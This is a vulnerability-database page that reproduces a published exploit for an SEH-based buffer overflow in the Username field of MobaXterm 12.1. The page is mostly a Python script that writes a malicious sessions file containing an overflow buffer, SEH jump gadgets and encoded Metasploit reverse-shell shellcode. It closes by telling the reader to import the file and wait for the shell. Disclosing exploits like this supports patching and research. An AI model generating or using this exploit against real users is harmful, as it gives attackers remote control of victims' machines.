Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Mobatek MobaXterm 12.1 Buffer Overflow

🗓️ 27 Sep 2019 00:00:00Reported by Xavi BeltranType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 267 Views

Mobatek MobaXterm 12.1 Buffer Overflow in Username Fiel

Code
`# Title: Mobatek MobaXterm 12.1 - Buffer Overflow (SEH)  
# Author: Xavi Beltran  
# Date: 2019-08-31  
# Vendor: xavibel.com  
# Vedor Page: https://mobaxterm.mobatek.net/download.html  
# Software Link: https://download.mobatek.net/1112019010310554/MobaXterm_Portable_v11.1.zip  
# Exploit Development process: https://xavibel.com/2019/09/01/mobaxterm-buffer-overflow-malicious-sessions-file-import/  
  
# Description:  
# SEH based Buffer Overflow in the Username field of a valid session  
# This exploit generates a malicious MobaXterm sessions file  
# When the user double clicks in the session, the shellcode is going to be executed  
# You need to adapt the exploit to your current OS Windows version  
  
#!/usr/bin/env python  
  
# This is not the IP address of the reverse shell  
# To be able to exploit the BOF you need to have a real machine with an open port that the target machine can reach  
  
ip_address = "192.168.1.88"  
port = "22"  
  
# We are going to recreate a MobaXterm sessions file export  
print ("[+] Creating the malicious MobaXterm file...")  
sessions_file = ""  
sessions_file += "[Bookmarks]\n"  
sessions_file += "SubRep=\n"  
sessions_file += "ImgNum=42\n"  
sessions_file += "pwnd=#109#0%" + ip_address + "%" + port + "%"  
  
# Here is the SEH Based Buffer Overflow part  
  
# [*] Exact match at offset 16672  
# We have to substract 4 that corresponds to NSEH  
junk1 = "A" * 16668  
  
# Here we need to jump forward but EB is a bad char  
# We decrease ESP and use a conditional jump after  
# I have learned this trick in OSCE. Thank you Muts   
nseh = ""  
nseh += "\x4C" # DEC ESP  
nseh += "\x4C" # DEC ESP  
nseh += "\x77\x21" # JA SHORT 1035FE59  
  
# Using a XP-SP1 so modules are compiled without SafeSEH  
# !mona seh -cp asciiprint  
# 0x762C5042 POP-POP-RET crypt32.dll  
seh = "\x42\x50\x2C\x76"  
  
# Some padding that we are going to jump over it  
junk2 = "\x42" * 29  
  
# We recover the initial state of the stack  
alignment = ""  
alignment += "\x44" # INC ESP  
alignment += "\x44" # INC ESP  
  
  
# And we reach our shellcode  
# A0 is a badchar but the generated encoded shellcode won't use it  
# /usr/share/framework2/msfpayload win32_reverse LHOST=192.168.1.88 LPORT=443 R > reverse_tcp  
# /usr/share/framework2/msfencode -e Alpha2 -i reverse_tcp -t perl > encoded_rev_shell  
# Shellcode 636 bytes  
shellcode = ""  
shellcode += "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x48\x49\x49"  
shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x63"  
shellcode += "\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x73\x41\x32\x41\x41\x32"  
shellcode += "\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x4b\x59\x6b\x4c\x71"  
shellcode += "\x7a\x5a\x4b\x30\x4d\x79\x78\x4c\x39\x4b\x4f\x79\x6f\x6b\x4f\x33"  
shellcode += "\x50\x6c\x4b\x62\x4c\x56\x44\x77\x54\x6e\x6b\x50\x45\x55\x6c\x6e"  
shellcode += "\x6b\x51\x6c\x55\x55\x54\x38\x57\x71\x5a\x4f\x4e\x6b\x52\x6f\x37"  
shellcode += "\x68\x6e\x6b\x53\x6f\x51\x30\x36\x61\x38\x6b\x70\x49\x4e\x6b\x70"  
shellcode += "\x34\x6e\x6b\x65\x51\x58\x6e\x47\x41\x6f\x30\x6c\x59\x4e\x4c\x4e"  
shellcode += "\x64\x6f\x30\x53\x44\x36\x67\x5a\x61\x39\x5a\x64\x4d\x53\x31\x49"  
shellcode += "\x52\x4a\x4b\x6b\x44\x67\x4b\x33\x64\x66\x44\x34\x68\x41\x65\x6b"  
shellcode += "\x55\x4e\x6b\x73\x6f\x54\x64\x65\x51\x58\x6b\x73\x56\x6e\x6b\x54"  
shellcode += "\x4c\x70\x4b\x6e\x6b\x31\x4f\x77\x6c\x33\x31\x48\x6b\x47\x73\x46"  
shellcode += "\x4c\x6c\x4b\x6e\x69\x70\x6c\x55\x74\x37\x6c\x73\x51\x6f\x33\x35"  
shellcode += "\x61\x4b\x6b\x62\x44\x4e\x6b\x57\x33\x36\x50\x6e\x6b\x41\x50\x76"  
shellcode += "\x6c\x6c\x4b\x34\x30\x67\x6c\x4c\x6d\x4c\x4b\x33\x70\x43\x38\x61"  
shellcode += "\x4e\x32\x48\x6c\x4e\x62\x6e\x34\x4e\x4a\x4c\x56\x30\x79\x6f\x58"  
shellcode += "\x56\x62\x46\x51\x43\x52\x46\x70\x68\x44\x73\x45\x62\x75\x38\x42"  
shellcode += "\x57\x32\x53\x75\x62\x31\x4f\x50\x54\x4b\x4f\x78\x50\x72\x48\x68"  
shellcode += "\x4b\x5a\x4d\x6b\x4c\x45\x6b\x70\x50\x39\x6f\x6b\x66\x43\x6f\x6e"  
shellcode += "\x69\x48\x65\x41\x76\x4f\x71\x48\x6d\x76\x68\x45\x52\x53\x65\x50"  
shellcode += "\x6a\x33\x32\x4b\x4f\x6e\x30\x31\x78\x4b\x69\x73\x39\x6c\x35\x6e"  
shellcode += "\x4d\x43\x67\x6b\x4f\x6e\x36\x50\x53\x41\x43\x46\x33\x51\x43\x30"  
shellcode += "\x43\x36\x33\x57\x33\x42\x73\x49\x6f\x7a\x70\x70\x68\x49\x50\x6d"  
shellcode += "\x78\x46\x61\x33\x68\x35\x36\x73\x58\x43\x31\x6d\x6b\x62\x46\x56"  
shellcode += "\x33\x4e\x69\x69\x71\x5a\x35\x51\x78\x7a\x4c\x4c\x39\x4e\x4a\x31"  
shellcode += "\x70\x36\x37\x49\x6f\x59\x46\x50\x6a\x52\x30\x70\x51\x31\x45\x6b"  
shellcode += "\x4f\x5a\x70\x71\x76\x72\x4a\x62\x44\x53\x56\x73\x58\x42\x43\x50"  
shellcode += "\x6d\x41\x7a\x32\x70\x42\x79\x51\x39\x38\x4c\x4c\x49\x69\x77\x71"  
shellcode += "\x7a\x41\x54\x4c\x49\x6a\x42\x70\x31\x4b\x70\x4b\x43\x6f\x5a\x4d"  
shellcode += "\x45\x4e\x69\x69\x6d\x39\x6e\x30\x42\x46\x4d\x59\x6e\x53\x72\x74"  
shellcode += "\x6c\x4c\x4d\x73\x4a\x70\x38\x4e\x4b\x4c\x6b\x4e\x4b\x31\x78\x71"  
shellcode += "\x62\x6b\x4e\x4e\x53\x76\x76\x79\x6f\x62\x55\x76\x48\x59\x6f\x4e"  
shellcode += "\x36\x53\x6b\x70\x57\x71\x42\x53\x61\x66\x31\x32\x71\x72\x4a\x34"  
shellcode += "\x41\x56\x31\x73\x61\x70\x55\x53\x61\x59\x6f\x7a\x70\x32\x48\x6c"  
shellcode += "\x6d\x38\x59\x73\x35\x58\x4e\x41\x43\x49\x6f\x6a\x76\x43\x5a\x69"  
shellcode += "\x6f\x6b\x4f\x30\x37\x59\x6f\x5a\x70\x73\x58\x6b\x57\x42\x59\x78"  
shellcode += "\x46\x70\x79\x49\x6f\x73\x45\x64\x44\x59\x6f\x7a\x76\x69\x6f\x43"  
shellcode += "\x47\x39\x6c\x39\x6f\x6e\x30\x45\x38\x6a\x50\x4f\x7a\x46\x64\x61"  
shellcode += "\x4f\x72\x73\x6b\x4f\x58\x56\x39\x6f\x78\x50\x63"  
  
crash = junk1 + nseh + seh + junk2 + alignment + shellcode  
  
# We need to mantain the MobaXterm sessions file structure  
sessions_file += crash  
sessions_file += "%%-1%-1%%%22%%0%0%0%%%-1%0%0%0%%1080%%0%0%1#MobaFont%10%0%0%0%15%236,236,236%30,30,30%180,180,192%0%-1%0%%xterm%-1%-1%_Std_Colors_0_%80%24%0%1%-1%<none>%%0#0# #-1"  
  
# We generate the file  
f = open( 'pwnd.mxtsessions', 'w' )  
f.write(sessions_file)  
f.close()  
  
print ("[+] pwnd.mxtsessions file created!")  
print ("[+] Import the sessions in MobaXterm and wait for the reverse shell! :)")  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
27 Sep 2019 00:00Current
0.5Low risk
Vulners AI Score0.5
buffer overflowmobaxtermseh-based
267